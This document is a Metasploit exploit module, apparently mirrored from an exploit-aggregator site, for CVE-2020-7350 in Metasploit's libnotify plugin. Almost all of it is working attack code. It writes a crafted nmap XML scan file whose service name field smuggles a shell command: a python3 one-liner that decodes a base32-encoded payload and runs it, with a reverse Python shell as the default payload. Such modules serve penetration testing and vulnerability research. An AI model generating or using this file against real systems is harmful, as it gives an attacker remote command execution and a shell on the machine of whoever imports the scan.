Share
## https://sploitus.com/exploit?id=MSF:EXPLOIT/UNIX/FILEFORMAT/METASPLOIT_LIBNOTIFY_CMD_INJECTION
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
                      'Name'           => 'Metasploit Libnotify Plugin Arbitrary Command Execution',
                      'Description'    => %q(
        This module exploits a shell command injection vulnerability in the
        libnotify plugin. This vulnerability affects Metasploit versions
        5.0.79 and earlier.
      ),
                      'DisclosureDate' => 'Mar 04 2020',
                      'License'        => GPL_LICENSE,
                      'Author'         =>
                        [
                          'pasta <jaguinaga@faradaysec.com>' # Discovery and PoC
                        ],
                      'References'     =>
                        [
                          [ 'CVE', '2020-7350' ],
                          [ 'URL', 'https://github.com/rapid7/metasploit-framework/issues/13026' ]
                        ],
                      'Platform'       => 'unix',
                      'Arch'           => ARCH_CMD,
                      'Payload'        =>
                        {
                          'DisableNops' => true
                        },
                      'DefaultOptions' =>
                        {
                          'PAYLOAD' => 'cmd/unix/reverse_python'
                        },
                      'Targets' => [[ 'Automatic', {}]],
                      'Privileged' => false,
                      'DefaultTarget' => 0))

    register_options(
      [
        OptString.new('FILENAME', [false, 'The file to write.', 'scan.xml']),
      ]
    )
  end

  def exploit
    xml = %(<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE nmaprun>
<nmaprun scanner="nmap" args="nmap -P0 -oA pepito 192.168.20.121" start="1583503480" startstr="Fri Mar  6 11:04:40 2020" version="7.60" xmloutputversion="1.04">
<host starttime="1583503480" endtime="1583503480"><status state="up" reason="user-set" reason_ttl="0"/>
<address addr="192.168.20.121" addrtype="ipv4"/>
<hostnames>
</hostnames>
<ports>
<port protocol="tcp" portid="22"><state state="open" reason="syn-ack" reason_ttl="0"/><service name="ssh';python3 -c &quot;import os,base64;os.system(base64.b32decode(b'#{Rex::Text.encode_base32(payload.encoded)}'.upper()))&quot;&amp;; printf '" method="table" conf="3"/></port>
</ports>
<times srtt="6174" rttvar="435" to="100000"/>
</host>
<runstats><finished time="1583503480" timestr="Fri Mar  6 11:04:40 2020" elapsed="0.22" summary="Nmap done at Fri Mar  6 11:04:40 2020; 1 IP address (1 host up) scanned in 0.22 seconds" exit="success"/><hosts up="1" down="0" total="1"/>
</runstats>
</nmaprun>
)

    print_status "Writing xml file: #{datastore['FILENAME']}"
    file_create xml
  end
end